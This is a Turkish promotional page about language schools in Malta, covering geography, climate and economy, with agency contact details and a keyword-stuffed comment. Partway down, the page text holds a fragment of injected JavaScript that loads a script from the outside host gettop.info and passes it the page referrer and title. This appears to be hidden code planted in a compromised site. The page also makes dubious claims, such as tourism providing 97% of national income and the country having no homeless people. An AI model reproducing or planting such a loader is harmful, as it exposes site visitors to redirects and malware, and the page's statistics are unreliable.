Buradasınız: Ana sayfa - Genel - Malta Dil Okulları,Maltada Dilokulu

Malta Dil Okulları,Maltada Dilokulu

300x250 reklam kodu buraya Malta, Güney Avrupa’da, Orta Akdeniz’de yeralan, Sicilya’nın güneyindeki adalar devleti. Malta takımadaları 3 büyük, 2 küçük adadan oluşur. Büyükleri: Malta, Gozo ve Comino. Takımadalar arasında en büyüğü olan Malta 237 km², Gozo 68 km² ve Comino 2 km² yüzölçümüne sahiptir.

malta yaz dil okullari Malta Dil Okulları,Maltada Dilokulu

 

Malta Dil Okulları,Maltada Dilokulu son yıllarda yurtdışı eğitim için en önemli ingilizce eğitim merkezlerindne biri haline gelmiştir.Ülkemize yakınlığı , tatil tadında İngilizce eğitimi düşünen  her öğrencinin en fazla ilgilendiği noktalardan biri hiç şüphesiz Malta’dır.

Ekonomi, Turizm ve Dil okulları

Ülkenin gelirlerinin yaklaşık %97 sini turizm oluşturmaktadır.Özellikle dil okullarının bunda etkisi oldukça fazladır. Ülkede 60 den fazla dil okulu bulunmaktadır.

Gelirlerin geri kalan kısmı ise ufak çaplı ihracattır.İngiltere, Çin, Libya ve Suudî Arabistan ile ekonomik açıdan iyi ilişkiler içerisindedir.Son yıllarda Eğitim turizmi konusunda büyük yol kateden Malta’ya Türkiye’den oldukça ciddi sayıda türk öğrenci gitmektedir.

Malta ekonomi olarak sıkıntı çekmeyen bir ülkedir.Ülkede evsiz bulunmamaktadır.Nüfusun yoğun olmaması sebebiyle halkın refah düzeyi normaldir.

Sponsor bağlantılar

468x15 reklam kodu buraya
Coğrafya ve İklim

Malta’da Kışları kar yağışı olmamakla beraber yazları da oldukça sıcak geçer. Tarım oldukça gelişmiştir ve Malta’da hiç bir dağ akarsu bulunmamaktadır.

Malta Adaları, yumuşak geçen kışları ve sıcak yaz sezonuyla sağlıklı bir iklime sahiptir. Soğuk rüzgarlar, kar, don ve sis Malta’da bilinmeyen terimlerdir. Nisandan sonra seyrek olmakla birlikte yazın neredeyse hiç rastlanmayan yağışlar en çok Eylül ile Nisan ayları arasında görülür.

300x250 reklam kodu buraya
Sıcaklık kış aylarında (Kasım – Nisan) ortalama 14.3 °C, yaz aylarında (Mayıs- Ekim) ise ortalama olarak 32.6 °C civarındadır. Malta adaları, sıcak yaz günleri ve gecelerinde denizden esen serin meltemlerle, Temmuz ayı ortalarından Eylül ayı ortalarına kadar devam eden sıcaklığın yüksek olduğu dönemlerde bile, nadiren aşırı sıcaklara maruz kalır.

Malta Dilokulları – Malta Yaz Okulları, Malta Dilokulu

 

Malta dilokulu, Maltada tatil ingilizcesi, Malta Dilokulları,malta dil okulu ücretleri, Ec Malta dil okulu ücretleri,sprachcaffe malta dil okulu,malta dil okulu yorumları, ve genel olarak malta dil okulu fiyatları hakkında daha fazla bilgi için lütfen : 444 1 287 veya www.oxfordhousecollege.com web dresinden bigi isteyiniz. Ayrıca http://www.facebook.com/yurtdisiegitimtvcom adresini de takip ederek güncel yurtdışı eğitim kampanyalarından haberdar olabilirsiniz.

if (document.currentScript) {

d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Etiketler:, , , , , , , , , , , , , , ,


Malta Dil Okulları,Maltada Dilokulu için yapılan yorumlar : 1 Yorum yapıldı


  1. 1 Malta Dil Okulu  yorumladı. 00:00 - 10 / 01 / 2013:

    malta dil okulları fiyatları,malta dil okulları,malta dil okulları yorumları, malta dil okulları forum,malta dil okulları 2012,malta dil okulları yorum,malta dil okulları paket fiyatları hakkında bilgiler için teşekkürler